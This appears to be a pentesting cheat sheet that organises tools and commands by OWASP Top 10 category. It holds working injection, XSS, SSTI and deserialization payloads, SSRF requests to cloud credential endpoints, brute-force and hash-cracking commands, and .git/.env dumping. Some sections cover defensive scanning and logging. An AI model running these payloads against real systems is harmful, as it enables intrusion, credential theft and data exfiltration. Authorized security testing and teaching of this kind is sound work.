Comprehensive toolkit for testing OWASP Top 10 vulnerabilities: scanners, browser extensions, proxies, fuzzers, and CLI tools with practical commands for access control testing, crypto analysis, injection detection, misconfig discovery, and more—safe testing only.
Burp Suite (Proxy/Repeater/Intruder)
- Intercept and modify requests
- Change IDs, parameters, tokens
# Community Edition (free)
# Professional features: Intruder, Scanner
# Manual test: Capture request, send to Repeater, modify user_id parameterOWASP ZAP (Zed Attack Proxy)
- Free alternative to Burp
zap.sh -daemon -port 8080 -config api.disablekey=true
# Or GUI mode: zap.shBurp Extensions
- Autorize: Automated authorization testing
- AuthMatrix: Test multiple users/roles
- Burp Bounty: Custom scan profiles
Browser Extensions
- Wappalyzer: Identify technologies
- Cookie-Editor: View/modify cookies
- EditThisCookie: Similar cookie manager
Manual Testing
# Change URL parameters
curl "https://example.com/api/user/123" -H "Authorization: Bearer YOUR_TOKEN"
curl "https://example.com/api/user/124" -H "Authorization: Bearer YOUR_TOKEN"
# Test different HTTP methods
curl -X DELETE "https://example.com/api/user/123" -H "Authorization: Bearer YOUR_TOKEN"
# Manipulate JWT tokens
# Decode JWT (base64)
echo "eyJhbGc..." | base64 -dSpecialized Tools
- jwt_tool: JWT manipulation
python3 jwt_tool.py <JWT_TOKEN>
python3 jwt_tool.py <JWT_TOKEN> -T # Tamper payload- Postman/Insomnia: API testing
- Create collections with different user tokens
- Test same endpoints with different credentials
SSL/TLS Testing
SSLScan
sslscan https://example.com
sslscan --show-certificate example.com:443TestSSL.sh (comprehensive)
./testssl.sh https://example.com
./testssl.sh --vulnerable example.com # Check known vulnerabilities
./testssl.sh --protocols example.com # Protocol supportNmap SSL Scripts
nmap --script ssl-enum-ciphers -p 443 example.com
nmap --script ssl-cert -p 443 example.com
nmap --script ssl-heartbleed -p 443 example.comSSLyze
sslyze example.com
sslyze --regular example.com
sslyze --heartbleed example.comCertificate Analysis
# View certificate
openssl s_client -connect example.com:443 -servername example.com </dev/null
# Check certificate expiry
openssl s_client -connect example.com:443 2>/dev/null | openssl x509 -noout -dates
# Check cipher suites
openssl s_client -connect example.com:443 -cipher 'DES-CBC3-SHA'Browser Extensions
- HTTPS Everywhere: Force HTTPS
- Certificate Patrol: Monitor cert changes
- SSL Labs Browser Check: Quick SSL test
Online Tools
- SSL Labs (Qualys): https://www.ssllabs.com/ssltest/
- Security Headers: https://securityheaders.com/
Secret Scanning
TruffleHog (Find secrets in Git repos)
trufflehog git https://github.com/user/repo --only-verified
trufflehog filesystem /path/to/projectGitLeaks
gitleaks detect --source . --verbose
gitleaks protect --staged # Pre-commit hookdetect-secrets
detect-secrets scan > .secrets.baseline
detect-secrets audit .secrets.baselineManual Checks
# Search for API keys in JS files
curl -s https://example.com/app.js | grep -iE "api[_-]?key|secret|token|password"
# Check for hardcoded credentials
grep -r "password\s*=\s*['\"]" /path/to/code
# Find exposed .env files
curl https://example.com/.env
curl https://example.com/.git/configSQL Injection
SQLMap (automated)
# Basic scan
sqlmap -u "https://example.com/page?id=1"
# With cookie/auth
sqlmap -u "https://example.com/page?id=1" --cookie="PHPSESSID=abc123"
# POST request
sqlmap -u "https://example.com/login" --data="user=admin&pass=test"
# Enumerate databases
sqlmap -u "https://example.com/page?id=1" --dbs
# Dump specific table
sqlmap -u "https://example.com/page?id=1" -D database -T users --dump
# From Burp request file
sqlmap -r request.txt --batchManual SQL Injection Testing
# Test for error-based SQLi
curl "https://example.com/page?id=1'"
curl "https://example.com/page?id=1' OR '1'='1"
# Union-based
curl "https://example.com/page?id=1 UNION SELECT NULL--"
# Time-based blind
curl "https://example.com/page?id=1' AND SLEEP(5)--"
# Boolean-based blind
curl "https://example.com/page?id=1' AND '1'='1"Burp Extensions
- SQLiPy: SQL injection scanner
- CO2: SQLMap integration
Command Injection
Commix (automated)
# Basic scan
commix -u "https://example.com/ping?ip=127.0.0.1"
# With cookie
commix -u "https://example.com/exec?cmd=ls" --cookie="SESSION=xyz"
# POST data
commix --data="ip=127.0.0.1" -u "https://example.com/ping"Manual Testing
# Basic command injection payloads
curl "https://example.com/ping?ip=127.0.0.1;whoami"
curl "https://example.com/ping?ip=127.0.0.1|ls"
curl "https://example.com/ping?ip=127.0.0.1`id`"
curl "https://example.com/ping?ip=127.0.0.1\$(whoami)"
# URL-encoded
curl "https://example.com/ping?ip=127.0.0.1%3Bwhoami"NoSQL Injection
NoSQLMap
python nosqlmap.py -u "https://example.com/login" --data="username=admin&password=test"Manual NoSQL Testing
# MongoDB injection (JSON)
curl -X POST "https://example.com/api/login" \
-H "Content-Type: application/json" \
-d '{"username": {"$ne": null}, "password": {"$ne": null}}'
# Authentication bypass
curl -X POST "https://example.com/api/login" \
-H "Content-Type: application/json" \
-d '{"username": "admin", "password": {"$gt": ""}}'XSS (Cross-Site Scripting) - often grouped with injection
XSStrike
python xsstrike.py -u "https://example.com/search?q=test"
python xsstrike.py -u "https://example.com/page" --data "name=test&comment=test"Dalfox
dalfox url "https://example.com/search?q=test"
dalfox file urls.txtManual XSS Testing
# Reflected XSS
curl "https://example.com/search?q=<script>alert(1)</script>"
# Test with different payloads
curl "https://example.com/search?q=<img src=x onerror=alert(1)>"
curl "https://example.com/search?q='><svg/onload=alert(1)>"LDAP Injection
# Manual testing
# Username: *)(uid=*))(|(uid=*
# Password: anythingTemplate Injection (SSTI)
tplmap
python tplmap.py -u "https://example.com/page?name=test"Manual SSTI Testing
# Jinja2/Flask
curl "https://example.com/page?name={{7*7}}"
curl "https://example.com/page?name={{config}}"
# Twig
curl "https://example.com/page?name={{7*'7'}}"
# FreeMarker
curl "https://example.com/page?name=<#assign ex='freemarker.template.utility.Execute'?new()>${ex('id')}"Business Logic Testing (mostly manual)
Burp Suite
- Repeater: Test state changes, race conditions
- Intruder: Fuzz numeric values (negative numbers, large values)
- Turbo Intruder: Race condition testing
Race Condition Testing
Turbo Intruder (Burp Extension)
# Example script for race conditions
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
requestsPerConnection=100,
pipeline=False)
for i in range(20):
engine.queue(target.req)
engine.start()Manual Race Testing
# Send simultaneous requests
for i in {1..10}; do
curl -X POST "https://example.com/api/transfer" \
-H "Cookie: session=xyz" \
-d "amount=100&to=attacker" &
done
waitManual Testing Checklist
# Test negative quantities
curl -X POST "https://example.com/api/cart" \
-d "item_id=123&quantity=-5"
# Test price manipulation
curl -X POST "https://example.com/api/checkout" \
-d "item_id=123&price=0.01"
# Skip workflow steps
# 1. Capture multi-step flow in Burp
# 2. Jump directly to step 3, skipping step 2 verificationTools for Rate Limit Testing
# ffuf for testing rate limits
ffuf -u "https://example.com/api/register" \
-X POST \
-H "Content-Type: application/json" \
-d '{"email":"[email protected]"}' \
-rate 100
# Check if CAPTCHA can be bypassed
curl -X POST "https://example.com/api/register" \
-d "[email protected]" # Without CAPTCHA tokenDirectory/File Enumeration
Dirb
dirb https://example.com
dirb https://example.com /usr/share/wordlists/dirb/common.txt
dirb https://example.com -o output.txtDirbuster (GUI)
dirbuster
# Select target, wordlist, and startGobuster
# Directory brute force
gobuster dir -u https://example.com -w /usr/share/wordlists/dirb/common.txt
# DNS subdomain enumeration
gobuster dns -d example.com -w /usr/share/wordlists/subdomains.txt
# With extensions
gobuster dir -u https://example.com -w wordlist.txt -x php,txt,html,bak
# With cookies/auth
gobuster dir -u https://example.com -w wordlist.txt -c "SESSION=xyz"Feroxbuster (modern, fast)
feroxbuster -u https://example.com -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u https://example.com -x php,txt,bak --depth 2ffuf (versatile fuzzer)
# Directory fuzzing
ffuf -u https://example.com/FUZZ -w wordlist.txt
# Virtual host discovery
ffuf -u https://example.com -H "Host: FUZZ.example.com" -w subdomains.txt
# Parameter fuzzing
ffuf -u https://example.com/page?FUZZ=value -w params.txt
# Filter by status code
ffuf -u https://example.com/FUZZ -w wordlist.txt -fc 404Configuration Scanners
Nikto (web server scanner)
nikto -h https://example.com
nikto -h https://example.com -o report.html -Format html
nikto -h https://example.com -Tuning 1 2 3 # Specific testsWhatWeb
whatweb https://example.com
whatweb -v https://example.com # Verbose
whatweb -a 3 https://example.com # AggressiveWapiti (web app vulnerability scanner)
wapiti -u https://example.com
wapiti -u https://example.com -m "backup,htaccess"Check Security Headers
curl -I https://example.com
# Look for missing headers:
# - Strict-Transport-Security
# - X-Content-Type-Options
# - X-Frame-Options
# - Content-Security-Policy
# - X-XSS-ProtectionOnline Tools
- Security Headers: https://securityheaders.com/
- Mozilla Observatory: https://observatory.mozilla.org/
Default Credential Testing
Hydra (brute force - use only authorized)
# HTTP basic auth
hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com http-get /admin
# HTTP POST form
hydra -l admin -P passwords.txt example.com http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"
# SSH
hydra -l root -P passwords.txt ssh://example.com
# FTP
hydra -l admin -P passwords.txt ftp://example.comMedusa
medusa -h example.com -u admin -P passwords.txt -M http
medusa -h example.com -U users.txt -P passwords.txt -M sshGit/SVN Exposure
GitTools
# Download exposed .git
./gitdumper.sh https://example.com/.git/ output/
# Extract commits
./extractor.sh output/ extracted/git-dumper
git-dumper https://example.com/.git/ output/Manual checks
curl https://example.com/.git/HEAD
curl https://example.com/.git/config
curl https://example.com/.svn/entries
curl https://example.com/.env
curl https://example.com/config.php.bakCloud Misconfig
S3Scanner
python s3scanner.py --bucket bucketname
python s3scanner.py --bucket-file buckets.txtAWS CLI
# List S3 bucket contents (if public)
aws s3 ls s3://bucketname --no-sign-request
# Download entire bucket
aws s3 sync s3://bucketname . --no-sign-requestBucket Stream (find buckets)
python bucket-stream.pyDependency Scanners
OWASP Dependency-Check
dependency-check --project "MyApp" --scan /path/to/project
dependency-check --project "MyApp" --scan . --format HTML --out report.htmlRetire.js (JavaScript libraries)
# CLI
retire --path /path/to/project
# Browser extension available for Chrome/Firefoxnpm audit (Node.js)
npm audit
npm audit fix # Auto-fix
npm audit --json > audit.jsonpip-audit (Python)
pip-audit
pip-audit --requirement requirements.txtSafety (Python)
safety check
safety check --file requirements.txt
safety check --jsonSnyk (multi-language)
snyk test
snyk test --file=package.json
snyk monitor # Continuous monitoringTrivy (containers & dependencies)
trivy fs /path/to/project
trivy image nginx:latest
trivy repo https://github.com/user/repoVersion Detection
Wappalyzer (browser extension)
- Identifies frameworks, libraries, versions
BuiltWith (online)
WhatWeb
whatweb -v https://example.comNmap version detection
nmap -sV example.com
nmap -sV -p 80,443 example.comManual checks
# Check response headers
curl -I https://example.com
# Look for version in HTML/JS
curl -s https://example.com | grep -i "version\|jquery\|angular\|react"
# Check specific library endpoints
curl https://example.com/jquery.js | head -1
curl https://example.com/js/app.js | grep -o "version.*"WordPress/CMS Scanners
WPScan (WordPress)
wpscan --url https://example.com
wpscan --url https://example.com --enumerate vp # Vulnerable plugins
wpscan --url https://example.com --enumerate u # Users
wpscan --url https://example.com --api-token YOUR_TOKEN # With vuln DBJoomscan (Joomla)
joomscan -u https://example.comDroopescan (Drupal, WordPress, SilverStripe, Moodle)
droopescan scan drupal -u https://example.com
droopescan scan wordpress -u https://example.comPassword Brute Force
Hydra
# HTTP form-based login
hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect"
# With CSRF token (more complex)
hydra example.com http-form-post "/login:username=^USER^&password=^PASS^:F=Login failed:H=Cookie: security=low; PHPSESSID=xyz"Patator
patator http_fuzz url="https://example.com/login" method=POST \
body='username=FILE0&password=FILE1' 0=users.txt 1=passwords.txt \
-x ignore:fgrep='Login failed'Session Analysis
Burp Suite
- Sequencer: Analyze session token randomness
- Send token to Sequencer
- Capture 100+ tokens
- Analyze entropy
Manual session testing
# Check if old session still works after logout
# 1. Login and capture session cookie
# 2. Logout
# 3. Replay request with old session
curl https://example.com/profile -H "Cookie: SESSION=old_token"
# Test session fixation
# 1. Get session before login
# 2. Login with that session
# 3. Check if session ID changedJWT Analysis
jwt_tool
# Analyze token
python3 jwt_tool.py eyJhbGc...
# Test for common vulnerabilities
python3 jwt_tool.py eyJhbGc... -M at # All tests
# Crack weak secret
python3 jwt_tool.py eyJhbGc... -C -d wordlist.txt
# Tamper claims
python3 jwt_tool.py eyJhbGc... -TJohn the Ripper (password cracking)
# Crack password hashes
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# With rules
john --wordlist=wordlist.txt --rules hashes.txt
# Show cracked
john --show hashes.txtHashcat
# MD5
hashcat -m 0 -a 0 hashes.txt wordlist.txt
# SHA-256
hashcat -m 1400 -a 0 hashes.txt wordlist.txt
# bcrypt
hashcat -m 3200 -a 0 hashes.txt wordlist.txt
# NTLM
hashcat -m 1000 -a 0 hashes.txt wordlist.txtMulti-Factor Authentication Testing
Manual checks:
# Test if MFA can be bypassed by going directly to post-login page
curl https://example.com/dashboard -H "Cookie: SESSION=token_before_mfa"
# Test backup codes
# - Are they rate-limited?
# - Can they be reused?
# - Are they logged?
# SMS/TOTP testing
# - Intercept and replay codes
# - Test code expiration
# - Test if same code works multiple timesBrowser Extensions
- Cookie-Editor: Manipulate session cookies
- JWT Debugger: Decode/verify JWTs
Deserialization
ysoserial (Java)
# Generate payload
java -jar ysoserial.jar CommonsCollections6 'calc.exe' > payload.ser
# Base64 encode for insertion
cat payload.ser | base64phpggc (PHP)
# List available gadgets
./phpggc -l
# Generate payload
./phpggc Laravel/RCE1 system id
# Base64 output
./phpggc -b Laravel/RCE1 system idDetection
# Look for serialized data patterns in cookies/parameters
# Java: rO0 (base64 of 0xAC 0xED)
# PHP: a:, O:, s:
# Python pickle: \x80 or starts with (
# Check cookies
curl -I https://example.com
# Check parameters
# Burp: Search responses for serialization patternsSubresource Integrity (SRI) Checking
Manual check
# View page source and check for integrity attributes
curl -s https://example.com | grep -i "integrity="
# Should see:
# <script src="https://cdn.example.com/lib.js"
# integrity="sha384-abc123..."
# crossorigin="anonymous"></script>Generate SRI hash
curl -s https://cdn.example.com/lib.js | openssl dgst -sha384 -binary | openssl base64 -ASupply Chain / CI/CD Testing
TruffleHog (scan repos for secrets)
trufflehog git https://github.com/user/repo
trufflehog github --org=orgnameGitleaks
gitleaks detect --source . --report-path report.jsonCheckov (IaC security)
checkov -d /path/to/iac
checkov -f DockerfileManual CI/CD checks
# Check if .git is exposed
curl https://example.com/.git/config
# Check CI config files
curl https://example.com/.gitlab-ci.yml
curl https://example.com/.github/workflows/deploy.yml
# Look for:
# - Hardcoded secrets
# - Insecure artifact storage
# - Missing signature verificationLog Analysis
grep/awk/sed (basic)
# Find failed login attempts
grep "Failed password" /var/log/auth.log
# Count by IP
grep "Failed password" /var/log/auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -rn
# Apache access log - find 404s
awk '$9 == 404' /var/log/apache2/access.logGoAccess (real-time web log analyzer)
goaccess /var/log/apache2/access.log -o report.html --log-format=COMBINED
goaccess /var/log/nginx/access.log --real-time-htmlLogwatch (summary emailer)
logwatch --detail High --mailto [email protected] --range todayLog Forwarding & SIEM
Filebeat (Elastic Stack)
# Install and configure
sudo apt install filebeat
sudo nano /etc/filebeat/filebeat.yml
sudo filebeat setup
sudo service filebeat startrsyslog (forward logs)
# In /etc/rsyslog.conf add:
*.* @@remote-host:514
# Restart
sudo systemctl restart rsyslogTesting for Logging
Manual checks
# Test if failed login is logged
curl -X POST https://example.com/login -d "user=admin&pass=wrong"
# Then check logs
# Test if sensitive actions are logged
# - Admin privilege escalation
# - Password changes
# - Data exports
# - Configuration changes
# Test if logs are tamper-proof
# - Can attacker delete logs?
# - Are logs centralized/remote?Burp Suite Logger++ (extension)
- Logs all requests/responses
- Useful for correlation with server logs
Detecting Lack of Monitoring
Check for:
# Missing security headers (CSP, HSTS)
curl -I https://example.com
# No rate limiting (test with multiple requests)
for i in {1..100}; do curl https://example.com/api/endpoint; done
# No account lockout after failed logins
# Manual: Attempt 10+ failed logins and see if account locksSSRFmap
python3 ssrfmap.py -r request.txt -p url
python3 ssrfmap.py -r request.txt -p url -m readfilesGopherus (generate SSRF payloads)
# For MySQL
gopherus --exploit mysql
# For Redis
gopherus --exploit redis
# For FastCGI
gopherus --exploit fastcgiManual SSRF Testing
Basic tests
# Internal IPs
curl "https://example.com/fetch?url=http://127.0.0.1"
curl "https://example.com/fetch?url=http://localhost"
curl "https://example.com/fetch?url=http://192.168.1.1"
curl "https://example.com/fetch?url=http://10.0.0.1"
# Cloud metadata (AWS)
curl "https://example.com/fetch?url=http://169.254.169.254/latest/meta-data/"
# URL encoding bypass
curl "https://example.com/fetch?url=http://127.0.0.1"
# Try: http://127.1, http://0x7f.0x0.0x0.0x1
# DNS rebinding
# Use services like:
# - http://1u.ms/ (convert IP to decimal)
# - http://nip.io (wildcard DNS)
curl "https://example.com/fetch?url=http://127.0.0.1.nip.io"SSRF payload list locations
# PayloadsAllTheThings
git clone https://github.com/swisskyrepo/PayloadsAllTheThings
# See SSRF Injection section
# SecLists
git clone https://github.com/danielmiessler/SecLists
# Fuzzing/SSRF-Injection-Payload-List.txtCloud metadata endpoints
# AWS
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Google Cloud
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Azure
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/tokenBurp Collaborator (detect blind SSRF)
# In Burp Suite Professional
# 1. Go to Burp > Burp Collaborator client
# 2. Copy payload URL
# 3. Inject into SSRF param
curl "https://example.com/fetch?url=http://YOUR_BURP_COLLABORATOR.burpcollaborator.net"
# Check Collaborator for DNS/HTTP interactionsInteractsh (open-source alternative)
# Server
interactsh-server
# Client
interactsh-client
# Use generated domain in SSRF tests
curl "https://example.com/fetch?url=http://YOUR_ID.interact.sh"Port Scanning via SSRF
# Scan internal ports
for port in {1..1000}; do
curl "https://example.com/fetch?url=http://127.0.0.1:$port" &
done
wait
# Or use Burp Intruder with port listBrowser Extensions
- HackBar: Quickly modify URLs
- Postman Interceptor: Capture and modify requests
Nuclei (vulnerability scanner with templates)
# Install
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
# Basic scan
nuclei -u https://example.com
# Scan with specific templates
nuclei -u https://example.com -t cves/
nuclei -u https://example.com -t vulnerabilities/
# Scan list of URLs
nuclei -l urls.txt
# Custom template
nuclei -u https://example.com -t custom-template.yamlOWASP ZAP (Full Suite)
# CLI spider + scan
zap-cli quick-scan -s all -r https://example.com
# Baseline scan (passive)
zap-baseline.py -t https://example.com
# Full scan
zap-full-scan.py -t https://example.comAcunetix / Netsparker / Burp Scanner (Commercial)
- Full automated web app scanners
- Cover most OWASP Top 10
- Require licenses
| Category | Must-Have Tools |
|---|---|
| Proxy/Intercept | Burp Suite, OWASP ZAP |
| Recon | nmap, WhatWeb, Wappalyzer |
| Directory/File | Gobuster, ffuf, Feroxbuster |
| Injection | SQLMap, Commix, XSStrike |
| Auth Testing | Hydra, jwt_tool, Hashcat |
| TLS/Crypto | testssl.sh, SSLScan, SSLyze |
| Secrets | TruffleHog, Gitleaks, detect-secrets |
| Dependencies | Retire.js, npm audit, OWASP Dependency-Check, Snyk |
| CMS | WPScan, Droopescan, Joomscan |
| SSRF | SSRFmap, Burp Collaborator, Interactsh |
| Deserialization | ysoserial, phpggc |
| Multi-purpose | Nuclei, Nikto, Wapiti |
| Extension | Use |
|---|---|
| Wappalyzer | Technology detection |
| Cookie-Editor | View/modify cookies |
| FoxyProxy | Proxy switching (Burp/ZAP) |
| Retire.js | Detect vulnerable JS libraries |
| HackBar | Quick payload injection |
| JWT Debugger | Decode JWTs |
| HTTPS Everywhere | Force HTTPS |